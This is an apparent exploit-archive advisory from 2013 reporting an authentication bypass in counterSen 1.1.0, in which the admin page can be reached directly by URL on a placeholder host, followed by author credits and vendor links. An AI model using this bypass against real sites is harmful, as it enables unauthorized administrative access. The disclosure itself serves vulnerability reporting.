id: 20237
date: 01/27/2013
title: counterSen 1.1.0 Admin Bypass Vulnerability
author: bd0rk
cves: 

=> counterSen 1.1.0 Admin Bypass Vulnerability

=> Discovered by: bd0rk

=> Contact: bd0rk[at]hackermail.com

=> Greetz: exploit-db.com, zone-h.org, Mandy, rgod, 1930

=> Affected Software: counterSen 1.1.0

=> Vendor: http://www.sensiebels.de/

=> DownloaD: http://www.sensiebels.de/download/download.php?id=countersen&fn=countersen&ex=zip

TESTED ON: Ubuntu-Linux

------------------------------------------------------
Exploit: http://[y0uRh0sT]/countersen/admin/index.php
------------------------------------------------------


The 24 years old, german Hacker bd0rk <---white-hat :-)

SpecialComment: NO WAR AROUND THE WORLD!

#  0day.today [2023-03-22]  #